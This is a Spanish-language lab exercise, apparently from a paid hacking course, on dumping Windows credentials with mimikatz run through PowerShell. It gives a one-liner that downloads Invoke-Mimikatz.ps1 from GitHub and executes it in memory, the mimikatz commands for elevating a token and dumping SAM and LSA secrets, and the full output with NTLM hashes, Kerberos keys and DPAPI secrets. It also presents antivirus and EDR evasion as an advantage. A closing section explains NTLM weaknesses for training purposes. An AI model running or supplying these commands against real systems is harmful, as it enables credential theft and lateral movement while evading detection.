Extraccion de credenciales con Mimikatz con PowerShell
Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/j265a0. ¡Te esperamos para empezar este viaje juntos!
OBJETIVO DEL EJERCICIO #7:
Utilizar mimikatz en formato de powershell sobre Windows para exfiltrar secretos. Para realizarlo es suficiente tener encendido UNICAMENTE WEBSERVER y First-DC.
Pros y Contras de ejecutar Mimikatz con mimikatz.ps1
Pros
Evasión: La versión de PowerShell puede ser más sigilosa, evadiendo mejor la detección de antivirus y soluciones EDR que buscan hashes de archivos conocidos.
Flexibilidad: Puede ser más fácil de ejecutar en memoria sin necesidad de escribir en el disco, lo cual es menos intrusivo y reduce la huella en el sistema de la víctima.
Integración: Se integra bien con otras herramientas y scripts de PowerShell, facilitando su uso en cadenas de ataque complejas.
Contras
Funcionalidad Limitada: Puede no tener todas las funciones que la versión completa .exe ofrece.
Logging de PowerShell: Las versiones más recientes de Windows tienen mejoras en el registro de actividades de PowerShell, lo que podría dejar rastros para los equipos de respuesta a incidentes.
Bloqueo de Scripts: Las políticas de ejecución de scripts y restricciones de firmas digitales pueden bloquear la ejecución de scripts PowerShell no firmados.
Despues de su ejecuccion, vamos obtener lo siguiente:
PS C:\Windows\system32> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1');PS C:\Windows\system32>Invoke-Mimikatz-Command '"token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "lsadump::secrets"' .#####. mimikatz 2.2.0 (x64) #19041 Jul 24 2021 11:00:11 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####'> https://pingcastle.com/ https://mysmartlogon.com***/mimikatz(powershell) # token::elevateToken Id : 0User name :SID name : NT AUTHORITY\SYSTEM712 {0;000003e7} 1 D 20573 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary-> Impersonated !*Process Token : {0;004ee8fb} 3 F 8116142 WEBSERVER\gerh S-1-5-21-35825707-945739770-2891244367-1000 (14g,24p) Primary* Thread Token : {0;000003e7} 1 D 8192060 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)mimikatz(powershell) # sekurlsa::logonpasswordsERROR kuhl_m_sekurlsa_acquireLSA ; Logon listmimikatz(powershell) # lsadump::samDomain : WEBSERVERSysKey : ea7b3f466f263386e6dc165bcde0d1d2Local SID : S-1-5-21-35825707-945739770-2891244367SAMKey : 0f38480331d27a37fb84a64691c96638RID : 000001f4 (500)User : Administrator Hash NTLM: f47f6266f4bb428db65cd949e7537f52Supplemental Credentials:* Primary:NTLM-Strong-NTOWF * Random Value : 95278d33a26e8418cde3b6bc618d5d4c* Primary:Kerberos-Newer-Keys *Default Salt : EC2AMAZ-N0S1NB6AdministratorDefault Iterations : 4096 Credentials aes256_hmac (4096) : 487149fe0751036e0aa497d82728570248f671894c39912e818bc058546478da aes128_hmac (4096) : 95f019490c136ba744dd27b3248d862d des_cbc_md5 (4096) : 264a2c3df40ba886 OldCredentials aes256_hmac (4096) : 27d1fe245f22752ae07fa19e6c4cb8c9a711d23fa43041c3eba9dea1c46879f4 aes128_hmac (4096) : 2881481a8717f3d3a4377847a1099566 des_cbc_md5 (4096) : 76315edf8a0191ea OlderCredentials aes256_hmac (4096) : 7e16bff797907f940783a6315b3ab4bd398542aabf2bc888506bce52b0961cf4 aes128_hmac (4096) : e87a3a66df7112bf158fd184ffa88547 des_cbc_md5 (4096) : 4a43754f1c08dca7* Packages * NTLM-Strong-NTOWF* Primary:Kerberos *Default Salt : EC2AMAZ-N0S1NB6Administrator Credentials des_cbc_md5 : 264a2c3df40ba886 OldCredentials des_cbc_md5 : 76315edf8a0191eaRID : 000001f5 (501)User : GuestRID : 000001f7 (503)User : DefaultAccountRID : 000001f8 (504)User : WDAGUtilityAccount Hash NTLM: d7da45674bae3a0476c0f64b67121f7dSupplemental Credentials:* Primary:NTLM-Strong-NTOWF * Random Value : be9923d30a0cdf3a73493d7d32eb96e4* Primary:Kerberos-Newer-Keys *Default Salt : WDAGUtilityAccountDefault Iterations : 4096 Credentials aes256_hmac (4096) : c5a174bdaaf42f78aea168d2bb0736459de5ad0b5051997187d8b86f7af8ee69 aes128_hmac (4096) : 17456060abe8c50bc7ec5474e44d0ae4 des_cbc_md5 (4096) : 5e435ecec4efbfdc* Packages * NTLM-Strong-NTOWF* Primary:Kerberos *Default Salt : WDAGUtilityAccount Credentials des_cbc_md5 : 5e435ecec4efbfdcRID : 000003e8 (1000)User : gerh Hash NTLM: ac1dbef8523bafece1428e067c1b114f lm -0: aea79244552e7a42ffb10c37ee4b914d ntlm-0: ac1dbef8523bafece1428e067c1b114fSupplemental Credentials:* Primary:NTLM-Strong-NTOWF * Random Value : eb9625a5e81c8b770853d14b69b85776* Primary:Kerberos-Newer-Keys *Default Salt : WEBSERVER.SPARTANCYBERSEC.CORPgerhDefault Iterations : 4096 Credentials aes256_hmac (4096) : 7d2f3fba7b830054393b17c51e40e28528a485c945f60888ca71f0bf6a377de6 aes128_hmac (4096) : 596354e6b4ef07925f24f7b617782c4f des_cbc_md5 (4096) : 20add654cd864c7a* Packages * NTLM-Strong-NTOWF* Primary:Kerberos *Default Salt : WEBSERVER.SPARTANCYBERSEC.CORPgerh Credentials des_cbc_md5 : 20add654cd864c7amimikatz(powershell) # lsadump::secretsDomain : WEBSERVERSysKey : ea7b3f466f263386e6dc165bcde0d1d2Local name : WEBSERVER ( S-1-5-21-35825707-945739770-2891244367 )Domain name : SPARTANCYBERSEC ( S-1-5-21-1861162130-2580302541-221646211 )Domain FQDN : spartancybersec.corpPolicy subsystem is : 1.18LSA Key(s) : 1,default {140c9bf8-da47-a27f-96d7-2b5527fd404e} [00] {140c9bf8-da47-a27f-96d7-2b5527fd404e} d51da8d90b5e95219f57070b04e71dfb6e95fc27241437fc8ef876b3c2ff43a6Secret : $MACHINE.ACCcur/hex : de ce 87 d1 ac 7b 8a ff c5 3b db 11 1d bd 9f 81 ca 32 f1 c5 cc 3f 89 cc 95 80 7a 97 1c 5d 2d 8b 28 af 7d 25 1a 53 7e b9 5c b9 2a 23 6a fb ca bb 9e 20 16 d4 3c f6 7e b4 b4 76 48 c6 b7 10 25 9a 07 b5 07 b2 7f d2 b1 b0 a1 b0 f9 ce a1 92 a7 26 3d 0d ff ca d8 16 5b 60 9d 20 64 ea d9 0b f5 5a c0 0f 79 1f a0 b4 e3 43 cd 63 d1 ec 14 f8 5d bb 4c e0 22 da 1e 83 6f 1a eb 39 82 cd 45 97 23 ea a4 ef d0 52 72 96 cb a1 f5 1c 07 ea ef cb 45 17 7b 5a f0 0b 8b 57 bb 8f 1e 35 2f f3 55 57 61 5b 4f 12 2f 51 11 c2 1b 60 59 39 c6 df 0c 06 9b 11 db 70 92 9e 90 6b 6c 49 f8 f7 d4 af 4c 86 21 87 e4 ea 57 50 a6 b7 87 ad 4d 61 c5 b0 35 84 79 c6 9d 26 8f a7 0f e7 3a e3 fb 34 24 88 27 fd c5 ae d5 61 67 1e eb 78 a7 05 dc 38 9a 9c 72 0a 44 cc
NTLM:7d0c4cdc32724b99ef4459147401471a SHA1:cd54e4ac32cca2e2ad07df657a832d9ee1cabe04old/text: Z`#z8G1g` C?s\`w5.#dP.ZE2b2IJ,eq/3HDbF>x6_Rzcae7:Y#'zDSKZ7p!^UP<2/t;UJf]h Aq2%&66=["R( 9nTwg$4@wp]iyUO@anq,'z]b*wP<7xo%[ NTLM:84d10e4ababc50787bb4a8fdd41dfd12 SHA1:8776b75a42d483e1c556999310cf88fd19ddbd87Secret : DPAPI_SYSTEMcur/hex : 0100000091 be 0d0d 7a 0712 fc 89 cd eb f3 391e9937 6b 34 ac d1 b5 b9 276f74 f7 bb 7f 9b 8c 21 e6 399883 e7 19 c4 ef f4 full: 91be0d0d7a0712fc89cdebf3391e99376b34acd1b5b9276f74f7bb7f9b8c21e6399883e719c4eff4 m/u : 91be0d0d7a0712fc89cdebf3391e99376b34acd1 / b5b9276f74f7bb7f9b8c21e6399883e719c4eff4old/hex : 010000003f581778 dc 26365237 eb 61208707 4c 7340 d8 737d363297 aa 2958 8c 35 f7 072634804233169f13 c7 b9 full: 3f581778dc26365237eb612087074c7340d8737d363297aa29588c35f7072634804233169f13c7b9 m/u : 3f581778dc26365237eb612087074c7340d8737d / 363297aa29588c35f7072634804233169f13c7b9Secret : NL$KMcur/hex : b6 96 c7 7e17 8a 0c dd 8c 39 c2 0a a2 912444 a2 e4 4d c2 095946 c0 7f95 ea 11 cb 7f cb 72 ec 2e 5a 0601 1b 26 fe 6d a7 880f a5 e7 1f a5 96 cd e5 3f a0 065e c1 a5 01 a1 ce 8c 247695old/hex : b6 96 c7 7e17 8a 0c dd 8c 39 c2 0a a2 912444 a2 e4 4d c2 095946 c0 7f95 ea 11 cb 7f cb 72 ec 2e 5a 0601 1b 26 fe 6d a7 880f a5 e7 1f a5 96 cd e5 3f a0 065e c1 a5 01 a1 ce 8c 247695
Uno de los hallazgos mas relevantes de la salida previa es el hash NTLM del administrador que es:
f47f6266f4bb428db65cd949e7537f52
El hash NTLM (NT LAN Manager) es una función hash utilizada por Microsoft para almacenar contraseñas de usuario. Es un método de cifrado que ha sido utilizado en varios protocolos de autenticación de Microsoft a lo largo de los años, incluidos los protocolos de autenticación de red como NTLMv1 y NTLMv2.
Características y detalles sobre el hash NTLM:
Forma de Creación: El hash NTLM se crea tomando la contraseña del usuario, convirtiéndola a Unicode y luego aplicando una función hash MD4.
No tiene SALT: A diferencia de otros métodos de almacenamiento de contraseñas, el hash NTLM no utiliza un "salto" (valor aleatorio agregado para hacer que el hashing sea más seguro). Esto lo hace vulnerable a ataques de fuerza bruta y a ataques de tabla arco iris, donde los atacantes usan tablas precomputadas para buscar rápidamente el valor original de un hash.
Uso en Protocolos: Aunque NTLM ha sido reemplazado en gran medida por métodos más seguros como Kerberos en entornos modernos de Active Directory, todavía se encuentra en muchas redes debido a la retrocompatibilidad o configuraciones heredadas.
Vulnerabilidades: Debido a sus debilidades inherentes y la falta de características de seguridad modernas, NTLM es susceptible a una variedad de ataques, como el mencionado ataque de tabla arco iris, ataques de relevo NTLM, y otros.
Recomendación: Debido a las debilidades conocidas asociadas con NTLM, se recomienda deshabilitar su uso siempre que sea posible, en favor de protocolos de autenticación más seguros como Kerberos.
